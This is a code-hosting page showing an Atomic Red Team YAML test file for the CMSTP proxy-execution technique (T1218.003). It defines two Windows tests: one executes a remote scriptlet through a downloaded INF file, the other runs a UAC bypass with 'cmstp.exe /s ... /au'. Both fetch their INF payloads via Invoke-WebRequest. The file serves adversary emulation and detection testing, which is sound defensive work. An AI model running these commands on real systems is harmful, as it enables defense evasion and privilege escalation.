security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
python_conversion
atomic-red-team/atomics/T1218.003/T1218.003.yaml
T
Carrie Roberts d4709021fb Handle spaces in file paths (#2535) 
* updating atomics count in README.md [ci skip]

* wip

* handle spaces in path

* update readme

* fix typo

---------

Co-authored-by: publish bot <opensource@redcanary.com>
2023-09-22 10:47:25 -06:00

52 lines
2.1 KiB
YAML
Raw Permalink Blame History

attack_technique: T1218.003
display_name: 'Signed Binary Proxy Execution: CMSTP'
atomic_tests:
- name: CMSTP Executing Remote Scriptlet
auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624
description: |
Adversaries may supply CMSTP.exe with INF files infected with malicious commands
supported_platforms:
- windows
input_arguments:
inf_file_path:
description: Path to the INF file
type: path
default: PathToAtomicsFolder\T1218.003\src\T1218.003.inf
dependency_executor_name: powershell
dependencies:
- description: |
INF file must exist on disk at specified location (#{inf_file_path})
prereq_command: |
if (Test-Path "#{inf_file_path}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_file_path}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003.inf" -OutFile "#{inf_file_path}"
executor:
command: |
cmstp.exe /s "#{inf_file_path}"
name: command_prompt
- name: CMSTP Executing UAC Bypass
auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0
description: |
Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
supported_platforms:
- windows
input_arguments:
inf_file_uac:
description: Path to the INF file
type: path
default: PathToAtomicsFolder\T1218.003\src\T1218.003_uacbypass.inf
dependency_executor_name: powershell
dependencies:
- description: |
INF file must exist on disk at specified location (#{inf_file_uac})
prereq_command: |
if (Test-Path "#{inf_file_uac}") {exit 0} else {exit 1}
get_prereq_command: |
New-Item -Type Directory (split-path "#{inf_file_uac}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.003/src/T1218.003_uacbypass.inf" -OutFile "#{inf_file_uac}"
executor:
command: |
cmstp.exe /s "#{inf_file_uac}" /au
name: command_prompt
Reference in New Issue View Git Blame Copy Permalink